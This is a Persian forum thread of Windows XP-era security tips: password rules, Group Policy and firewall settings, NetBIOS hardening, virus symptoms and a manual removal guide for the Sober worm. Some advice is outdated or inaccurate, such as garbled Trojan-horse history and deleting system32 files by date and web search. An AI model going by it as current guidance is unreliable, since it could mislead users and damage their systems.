· کلمه عبور را به رئیس نگویید
· در مورد کلمه عبور در جلوی دیگران صحبت نکنید.
· به قالب کلمه عبور اشاره نکنید (مثلا نام خانوادگی)
· کلمه عبور را روی فهرست سوالات یا فرمهای امنیتی درج نکنید.
· کلمه عبور را با اعضای خانواده در میان نگذارید.
· کلمه عبور را هنگامی که در مرخصی هستید به همکاران نگویید.
اگر کسی از شما کلمه عبور را پرسید، از ایشان بخواهید که این مطلب را مطالعه کند یا اینکه با کسی در قسمت امنتیت اطلاعات تماس بگیرد.
از ویژگی “Remember Password” یا حفظ کلمه عبور در کامپیوتر استفاده نکنید.
مجددا، کلمات عبور را در هیچ جای محل کار خود ننویسید و در فایل یا هر سیستم کامپیوتری ذخیره نکیند (شامل کامپیوترهای دستی) مگر با رمزکردن.
کلمات عبور را حداقل هر شش ماه عوض کنید (بجز کلمات عبور سطح سیستم که باید هر سه ماه تغییر کنند).
اگر هر اکانت یا کلمه عبور احتمال فاش و سوءاستفاده از آن میرود، به بخش امنیت اطلاعات اطلاع دهید و تمام کلمات عبور را تغییر دهید.
شکستن یا حدس زدن کلمه عبور ممکن است در یک زمان متناوب یا اتفاقی توسط بخش امنیت اطلاعات یا نمانیدگی های آن رخ دهد. اگر کلمه عبور در طول یکی از این پیمایش ها حدس زده یا شکسته شود، از کاربر خواسته خواهد شد که آن را تغییر دهد.
رعایت موارد مذکور، به حفاظت بیشتر از اطلاعات و قسمتهای شخصی افراد کمک خواهد کرد.
mozhgan
02-16-2011, 06:09 PM
محدود کردن دسترسی به کنترل پنل و اجزای آن
درویندوز ۲۰۰۰ و XP برنامه ای هست بنام Group Policy که ازطریق آن میتوان دسترسی به سیستم را به روشهای گوناگون محدود کرد از جمله Control Panel یکی از آنهاست که میتوان کارهای زیر را در مورد آن انجام داد :
الف – دسترسی محدود به Control Panel و یا از کار انداختن اجزای آن به طور کامل.
ب – نمایش دادن گزینه های خاصی در Control Panel .
پ – پنهان کردن گزینه های خاصی از دید کاربر.
برای پنهان کردن کنترل پنل مراحل زیر را انجام دهید :
۱- از منوی Start گزینه Run را انتخاب کنید و بنویسید gpedit.msc و سپسOK کنید.
۲- در قسمت User Configuration به Administrative Templates بروید روی آن کلیک کنید (یا در قسمت زیرش Control Panel را کلیک کنید) تا گزینه های آن در پنل سمت راست نمایان شوند و بعد روی Control Panel کلیک کنید.
۳- اگرویندوز شما ۲۰۰۰ است بر روی Disable Control Panel و اگر xp است بر روی Prohibit access to the Control Panel دوبار کلیک کنید.
۴- گزینه Enable را انتخاب کنید و OK را بزنید
از این ببعد هیچکس قادر به دسترسی به Control Panel نیست حتی خود شما Administrator .
نکته : برای برگرداندن کنترل پنل مراحل بالا را دو باره انجام دهید و ایندفعه Not Configured را تیک بزنید.
درسیستم Workgroup محدودیت به تمام کاربرهای سیستم اعمال میشود حتی Administrator و برای رهایی از این مشکل باید از یک سیستم مبتنی بر Domain استفاده کرد تا بتوان با استفاده از OU ها تغییرات را به کاربرها و گروههای خاص اعمال کرد.
گزینه های مورد نظر برای نمایش یا عدم نمایش:
اگر میخواهید یک گزینه یا چندین گزینه را مخفی کنید و بقیه گزینه ها نمایش داده شوند :
۱- مرحلهای شماره ۱ و ۲ بالا را دو باره انجام دهید.
۲- بر روی Hide Specified Control Panel Applets کلیک کنید و Enable را انتخاب کنید.
۳-بر روی Show کلیک کنید و در صفجه بعد دکمه Add را بزنید.
۴- در پنجره جدید نام کنترل مورد نظررا بنویسید. نامی که وارد میکنید باید عیناً نام در Control Panel باشد.
مثال : میخواهید کنترلPower Options را از دید خارج کنید باید بنویسید Power Options و پنجره ها را OK کنید.
از این ببعد هنگام مراجعه به Control Panel دیگر Power Options را نمی بینید.
توضیح اینکه: فقط گزینه دیده نمیشود و کسی که وارد به جزییات است میتواند با نوشتن sysdm.cpl در کادر فرمان آن را نمایان کند.
نکته : برای برگرداندن گزینه ها مراحل بالا را یک بار دیگر انجام دهید و گزینه هایی را که انتخاب کرده اید را پاک کنید و ایندفعه Not Configured را تیک بزنید.
mozhgan
02-16-2011, 06:10 PM
مدیریت پورت ها و جلوگیری از بروز مشکل به وسیله Firewall
واژه Firewall یا دیواره آتش یک لغت بسیار مهم در مسئله امنیت میباشد که مطمئن هستم شما هم تا به حال این لغت را بارها شنیده اید و یا حتی ممکن است از آن استفاده نیز کرده باشید. امروزه نرم افزارهای بسیار زیادی وجود دارند که دارای قابلیت Firewall هستند مانند نرم افزارهای شرکتهای Symantec و McAfee و … کار کلی این ابزارها جلوگیری از هک شدن سیستم یا همان نفوذ نفوذگران است.
اگر شما کاربری هستید که از ویندوز XP استفاده میکنید و تا به حال هم از برنامه های Firewall استفاده نکردید ، پیشنهاد میکنم قابلیت Firewall را که به صورت پیش فرض در ویندوز XP وجود دارد فعال کنید. برای این کار میتوانید ابتدا از طریق Control Panel یا منوی Start وارد قسمت Network Connections شده و روی Connection مورد نظر راست کلیک کرده و گزینه Properties را انتخاب کنید. بعد وارد قسمت Advanced شده و تیک کنار عبارت … Protect my computer and network by را فعال کرده و سپس روی OK کلیک کنید. همان طور که گفتم با این کار قابلیت Firewall ویندوز فعال میشود. آموزش تنظیمات Firewall را نیز به زودی خواهم داد اما فعلا بحث من اصلا این چیزها نیست ! بحث امروز من راجع به مشکلاتی است که یک دیواره آتش میتواند در اینترنت ایجاد کند. این مشکلات بیشتر در برنامه هایی بروز میکند که نیاز به برقراری ارتباط با اینترنت را دارند و Firewall مانع این کار میشود. با وجود اینکه این قابلیت از لحاظ محافظت از سیستم شما بسیار حائز اهمیت است ولی علی الخصوص زمانی که سیستم شما به یک مودم کابلی یا اتصال DSL متصل است میتواند مانع برقراری ارتباطاتی مانند کنفرانس تلفنی یا بازیهای اینترنتی و حتی ارتباط با سرور وب گردد. اگر یکی از برنامه های ارتباطی سیستمتان مانند برنامه AOL Instant Messenger یا Windows Messenger و… به خوبی عمل نمیکند و دچار مشکل است لازم است دستورالعملی را برای Internet Connection Firewall تعریف کنید تا در شبکه ایمنی خود برخی از دروازه ها که پورتهای TCP نامیده میشوند را جایز شمارد و اجازه برخی نقل و انتقالات را صادر نماید. برای رفع این مشکلات ادامه مقاله را دنبال کنید : در ابتدا باید پورتهای مورد نیاز برای ارتباطات برنامه مورد نظر را بیابید. برای این منظور میتوانید از اطلاعات موجود در فایلهای راهنمای خود برنامه استفاده کنید و یا به قسمت پشتیبانی فنی یا همان Technical Support وب سایت برنامه مورد نظر مراجعه کنید و با آنها مشورت کنید. به عنوان مثال برنامه AOL Instant Messenger از پورتهای TCP با شماره های ۴۴۳ ، ۵۶۴ و ۵۱۹۰ استفاده میکند و در برنامه Microsoft NetMeeting لازم است تا پورتهای ۱۷۳۱ ، ۱۷۲۰ ، ۱۵۰۳ ، ۵۲۲ و ۳۸۹ باز باشند. برای آغاز کار روی دکمه Start کلیک کنید و گزینه Run را انتخاب کنید بعد تایپ کنید cmd و سپس Enter را بزنید تا محیط Command Prompt ظاهر شود. در پنجره Command Prompt عبارت ipconfig را تایپ کنید و سپس Enter را بزنید ( در این لحظه حتما باید تماس شما با اینترنت برقرار باشد ). بعد از زدن Enter یک شماره IP که کد سیستم شما را در اینترنت مشخص میکند نمایش داده خواهد شد. این شماره را روی یک کاغذ یادداشت کنید. اگر ارتباط اینترنت شما از طریق مودم کابلی یا DSL انجام نمیشود یادداشتی از آدرس IP تطبیق دهنده Ethernet متصل شده به مودم خود تهیه کنید. در محیط Command Prompt تایپ کنید Exit و سپس Enter را بزنید تا صفحه Command Prompt بسته شود. حالا نوبت به بازگشایی پورتها میرسد : ابتدا طبق مراحل گفته شده در بالا وارد قسمت Network Connections شده و سپس روی Connection مورد نظر راست کلیک کرده و بعد وارد Properties آن شوید. سپس وارد زبانه Advanced شده و در آنجا روی دکمه Settings کلیک کنید ( توجه داشته باشید که برای دستیابی به قسمت Settings حتما باید تیک عبارت … Protect my computer که در بالا گفته شد فعال باشد ). در صفحه Advanced Settings و در زبانه Services روی دکمه …Add کلیک کنید. در کادر محاوره ای Service Settings نامی را که میخواهید در لیست سرویسهای زبانه Services برای سرویس مورد نظر نمایش داده شود تایپ کنید. در کادر Name or IP address آدرس IP کامپیوتر خود را که در مراحل بالا یادداشت کردید تایپ کنید. در هر دو کادر External Port Number و Internal Port Number شماره پورت TCP را تایپ کنید ( اطمینان حاصل کنید که گزینه TCP انتخاب شده باشد ). در بیشتر مواقع و حالتها در این دو کادر شماره های مشابه تایپ میشوند. سپس روی OK کلیک کنید. با این کار فقط میتوان یک پورت را باز کرد. در صورت نیاز به باز کردن پورتهای دیگر باید مراحل را مجددا تکرار کنید. توجه داشته باشید که برخی از برنامه ها نیزمند باز بودن برخی از پورتهای UDP نیز علاوه بر پورتهای TCP میباشند. برای این منظور کافی است نوع پورت را در صفحه Service Settings از نوع UDP انتخاب کرده و شماره پورت UDP را در دو محل مذکور تایپ کنید. با انجام این مراحل مشکلات برنامه های شما حل خواهند شد و میتوانید از آنها به بهترین نحو در کنار Firewall سیستم خود استفاده کنید .
mozhgan
02-16-2011, 06:11 PM
رفع یک مشکل امنیتی معمول در ویندوز
متأسفانه بسیاری از کاربران ویندوز از یک شکاف امنیتی موجود در تنظیمات شبکه کامپیوتر بی اطلاع هستند.
تنظیمات معمول شبکه در ویندوز به شرح زیر است:
Client for Microsoft Networks
file and printer sharing for Microsoft Networks
NET BEUI Protocol
Internet Protocol TCP/IP
اگر در تنظیمات ویندوز شما NetBIOS مجاز باشد یک مشکل امنیتی در TCP/IP دارید.
· ممکن است فایلهای شما در کل اینترنت به اشتراک گذاشته شوند بدون انکه شما مایل به این عمل باشید.
· Work Group-name , Computer name , Login- name برای دیگران قابل مشاهده است.
· فایلهای شما میتوانند در کل اینترنت به اشتراک گذاشته شود.
کامپیوترهایی که به هیچ شبکهای متصل نشدهاند هم میتوانند در معرض خطر باشند زمانیکه برای اولین بار به اینترنت متصل میشوید تنظیمات شبکه شما تغییر میکند.
حل مشکل:
برای کاربران ویندوز۲۰۰:
با disable کردن NetBIOS در TCP/IP می توانید مشکل را حل کنید:
· ویندوز اکسپیلورر را باز کنید.
· روی My Network places راست کلیک کنید.
· properties را انتخاب کنید.
· روی Local Are a Network راست کلیک کنید.
· properties را انتخاب کنید.
· Internet protocol TCP/IP را انتخاب کنید.
· روی properties کلیک کنید.
· روی Advanced کلیک کنید.
· وارد قسمت WINS شوید.
· Disable NetBIOS over TCP/IP را انتخاب کنید و OK را کلیک کنید.
اگر برای شما پیغامی به صورت “…This connection has an empty” ظاهر شد آن را نادیده بگیرید و روی YES کلیک کنید و سپس OK را بزنید تا بقیه پنجره ها را ببندید.
بعد از انجام این کارها باید کامپیوتر خود را restart کنید.
برای کاربران ویندوز ۹۸ و ۹۵ و me:
می توانید مشکل خود را با disable کردن NetBIOS over TCP/IP
· ویندوز اکسپلورر را باز کنید.
· روی My Network places راست کلیک کنید.
· properties را انتخاب کنید.
· Internet protocol TCP/IP را انتخاب کنید.
· روی properties کلیک کنید.
· وارد قسمت NetBIOS شوید.
· علامت تیک NetBIOS over TCP/IP را بردارید. روی OK کلیک کنید.
در این ویندوزها باید TCP/IP Binding را برای File and printer sharing غیر فعال کنید.
· ویندوز اکسپیلورر را باز کنید.
· روی My Network places راست کلیک کنید.
· properties را انتخاب کنید.
· Internet protocol TCP/IP را انتخاب کنید.
· روی properties کلیک کنید.
· وارد قسمت Bindings شوید.
· علامت تیک Client for Microsoft Network را بردارید. علامت تیک File and printer sharing را بردارید.
· روی OK کلیک کنید.
اگر پیغامی مانند: “…You must select a driver” را دریافت کردید. روی YES کلیک کنید. و روی OK کلیک کنید تا پنجره های دیگر را ببندید.
اگر هنوز می خواهید فایلها و پرینتر شما در شبکه فعال باشد، باید از پروتکل NetBEUI به جای TCP/IP استفاده کنید. مطمئن باشید که آن را برای شبکه محلی خود فعال کرده اید.
مراحل به شرح زیر است:
· ویندوز اکسپیلورر را باز کنید.
· روی My Network places راست کلیک کنید.
· properties را انتخاب کنید.
· NetBEUI را انتخاب کنید.
· روی properties کلیک کنید.
· وارد قسمت Bindings شوید.
· برای Client for Microsoft Networks علامت تیک بگذارید.
· برای File and printer sharing علامت تیک بگذارید و روی OK کلیک کنید.
اکنون باید کامپیوتر خود را ری استارت کنید (restart) کنید. تا تغییرات در سیستم شما اعمال شوند.
دسترسی به اینترنت یک ریسک امنیتی است.
زمانی که به اینترنت دسترسی دارید. از یک آدرس IP مانند ۸۳٫۱۵۰٫۶۱٫۱۳۰ برای شناسایی شما استفاده می شود. اگر کامپیوتر خود را محافظت نکنید این آدرس IP می تواند برای دست یابی به کامپیوتر شما از دنیای اینترنت استفاده شود.
یک آدرس IP ثابت دارای یک خطر امنیتی بالا است.
اگر شما از یک مودم به صورت dial-up به اینترنت متصل می شوید هر بار که به اینترنت متصل می شوید یک آدرس IP خواهید داشت. اما اگر یک آدرس IP ثابت داشته باشید (مانند ADSL) آدرس IP شما هرگز تغییر نمی کند. و در این حالت اطلاعات خصوصی و محرمانه شما همیشه در خطر لو رفتن قرار دارد. و همیشه باید ورودی های کامپیوتر خود را چک کنید.
mozhgan
02-16-2011, 06:12 PM
علائم وجود ویروس
گاهی اوقات احساس می شود که برنامه های کامپیوتر درست اجرا نمی شود و یا سیستم بی دلیل دچار وقفه است . از بین دلایل مختلف این امر یکی وجود ویروس است که از نشانه های وجود آن در سیستم می توان به موارد زیر اشاره کرد :
-۱ انجماد بی دلیل
-۲ پر شدن بی دلیل Ram
-3 روشن ماندن هارد در زمان استفاده نشدن
-۴ تغییر تاریخ فایل های اجرایی مهم و با پسوند Com و Exe
-5 حضور فایل های بیگانه
-۶ از بین رفتن بخشهایی از برنامه های موجود در سیستم و گاهی کل آنها
طبقه بندی ویروسها
-۱ خود ویروس که با پسوند های اجرایی و گاهاً حالت ضمیمه به غیر اجرایی ها به محض ورود مشغول انجام دستورات داده شده می گردد.
-۲ کرم ها که با پر کردن رم و ایجاد حفره در سیستم ایجاد اختلال می کنند.
-۳ اسب های تروا که معمولا در باکسهای برنامه به صورت نهفته وجود دارند و منتظر اجرا هستند و به همین علت به آنها اسب تروا میگویند.( حتما داستان جنگ اساطیری روم را شنیده اید که سربازان رومی با مخفی شدن در اسب تروا توانستند به داخل شهر یونانی ها وارد شوند و جنگ را به نفع خود تمام کنند.عملکرد این ویروس عیناً همانند همین اسب و سربازان است. بدین ترتیب که اسب باکس یا جعبه برنامه است و به جای سربازان ویروس مخفی شده است.)
-۴ بمبها
۴ -۱بمب منطقی : این بمب به عملکرد خاصی حساس است . مانند استارت ویندوز یا اجرای یک برنامه
۴-۲ بمب زمانی : همانطور که از نامش پیداست در زمان خاصی عمل می کند. مانند چرنویل که در سالروز واقعه چرنویل روسیه عمل میکند.
۴-۳ بمب خوشه ای : این بمب در یونیکس استفاده می شود که لازم به توضیح نمیبینم عملکرد آنرا تفضیل کنم.
mozhgan
02-16-2011, 06:13 PM
با این ترفند آنتی ویروس ماهری بشوید !!!
خیلی اوقات پیش می آید که کامپیوتر شما دچار ویروسی می شود که امکان اسکن و تشخیص آن توسط آنتی ویروس وجود ندارد و یا آنکه ویروس با تشخیص نصب بودن آنتی ویروس بروی سیستمتان عملکرد آن را دچار اختلال می کند و مانع از این می شود که شما بتوانید از آنتی ویروس خود برای اسکن کامپیوتر استفاده کنید. در این شرایط چه باید کرد؟ آیا راهی وجود دارد که بتوان در این شرایط کامپیوتر را خودمان اسکن کنیم و مشکل به وجود آمده در آنتی ویروس را برطرف کرد؟ پاسخ تمامی این سوالات مثبت است! در این ترفند قصد داریم به معرفی روشی ابتکاری و در عین حال کاربردی بپردازیم که با استفاده از آن میتوانید کامپیوتر خود را شخصأ اسکن کنید و ویروس موجود را پاک کنید ، بدون بهره گیری از هیچ نوع آنتی ویروسی!
اولین قدم برای اسکن کردن کامپیوترتان نمایش فایل های مخفی در کامپیوتر می باشد.
برای انجام این کار : ابتدا با مراجعه به My Computer بروی منوی Tools کایک کنید و از منوی حاصل بروی عبارت Folder Options کلیک کنید. سپس بروی برگه View کلیک کنید و در این برگه تیک کنار عبارت های Show Hidden Files and Folders را فعال کنید و تیک کنار عبارت Hide Extensions For Known File Types را بردارید و بروی عبارت OK کلیک نمایید.
اینک از طریق مسیر C:/Windows/system32 به پوشه System32 مراجعه کنید. پس از ورود به پوشه system32 بروی منوی View کلیک کنید و از منوی حاصل عبارت Details را انتخاب کنید.
حال در پوشه system32 بروی جدا کننده Date Modified کلیک کنید و آنرا به سمت راست بکشید به طوری که تاریخ تمامی فایل ها یه طور کامل نمایش داده شود.
فایل های نمایش داده شده در پوشه system32 فایل های سیستمی مربوط به ویندوز می باشد که اکثرا با پسوند dll می باشد و این بخش معمولا مورد هدف ویروس ها و Spyware قرار می گیرد و خود را در بین این فایل ها مخفی می کنند.
اگر دقت کنید متوجه خواهید شد که اکثر این فایلهای قرار گرفته در این بخش دارای یک زمان مشخص می باشد و این زمانها (مثلا ۸/۱۰/۲۰۰۴) معرف این می باشد که مایکروسافت در این تاریج برنامه مربوط به فایل مورد نظر را به پایان رسانیده است (ترفندستان) و در واقع این زمان ها هیچ ربطی به زمان نصب ویندوز ندارد. حال اگر ویروس و یا spyware به این بخش حمله کند زمان آن با زمان فایل های سیستمی موجود در پوشه system32 مطابق ندارد و زمانی جدید تر از زمان مربوط به فایلهای سیستمی ویندوز خواهد بود و به راحتی از طریق مشاهده زمان های قرار گرفته در Date Modified قابل تشخیص می باشد. البته نکته بسیار مهم که باید توجه شود این است که نصب یک سخت افزار جدید و یا یک نرم افزار خاص می تواند فایلی را در این بخش کپی کند که زمان آن با زمان فایل های سیستم مطابق ندارد.
پس برای اینکه فایلی را در این بخش به اشتباه پاک نکنید روشی را مطرح میکنیم که این اشتباه رخ ندهد:
اگر میان فایل های واقع در پوشه system32 به فایلی برخورد کردیدکه تاریخ آن با تاریخ فایل های سیستمی ویندوز مطابقت نداردبروی این فایل کلیک راست کنید و گزینه Properties را انتخاب نمایید. سپس در پنجره Properties بروی برگه Version کلیک کنید و در این برگه نام کمپانی و ورژن فایل مورد نظر را مطالعه کنید.
اگر اطلاعات این فایل شامل نام کمپانی و خیلی اطلاعات دیگر برایتان آشنا نبود نام فایل مورد نظر را در موتور جستجو گر گوگل تایپ کنید و اگر در نتایج جستجو به این اشاره شده بود که این فایل ویروس است حتما آن را پاک کنید ولی اگر در نتایج جستجو به آلوده بودن این فایل اشاره نشده بود این فایل به واسطه یک سخت افزار و یا نرم افزاری به وجود آمده است.
mozhgan
02-16-2011, 06:13 PM
نحوه پاکسازی ویروس W32/Sober.r@MM
نام ویروس : W32/Sober.r@MM
نوع : ویروس
میزان حجم : ۱۱۳,۵۵۱
طریقه پخش : E-mail
تشریح :
این کرم خود را از طریق فایل های ضمیمه به نام های KlassenFoto.zip و pword_change.zip و screen_photo.zip و privat-photo.zip پخش می کند .
درون این فایل های Zip شده فایل های اجرایی به نام PW_Klass.Pic.packed-bitmap.exe و Screen_Photo.jpeg-graphic1.exe
این کرم در مرحله اول شاخه های زیر را در رجیستری تهیه می کند :
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\
Run ” WinINet” =C:\WINDOWS\ConnectionStatus\services.exe
• HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\
Run “_WinINet”=C:\WINDOWS\ConnectionStatus\service s.ex e
سپس فایل های زیر را می سازد :
• c:\WINDOWS\ConnectionStatus\netslot.nst
• c:\WINDOWS\ConnectionStatus\services.exe
• c:\WINDOWS\ConnectionStatus\socket.dli
سپس فایل های با حجم ۰ درست می کند با نام و آدرس های زیر :
• c:\WINDOWS\system32\bbvmwxxf.hml
• c:\WINDOWS\system32\gdfjgthv.cvq
• c:\WINDOWS\system32\langeinf.lin
• c:\WINDOWS\system32\nonrunso.ber
• c:\WINDOWS\system32\rubezahl.rub
• c:\WINDOWS\system32\seppelmx.smx
سپس پورت های شماره TCP 587 و TCP 37 و صفحه خانگی قربانی را عوض می کند .
برای پاک سازی دستی هم می توانید از طریق Safe mode فایل های یاد شده را پاک و شاخه ایجاد شده را در رجیستری پاک کنید .
vBulletin v4.2.5, Copyright ©2000-2024, Jelsoft Enterprises Ltd.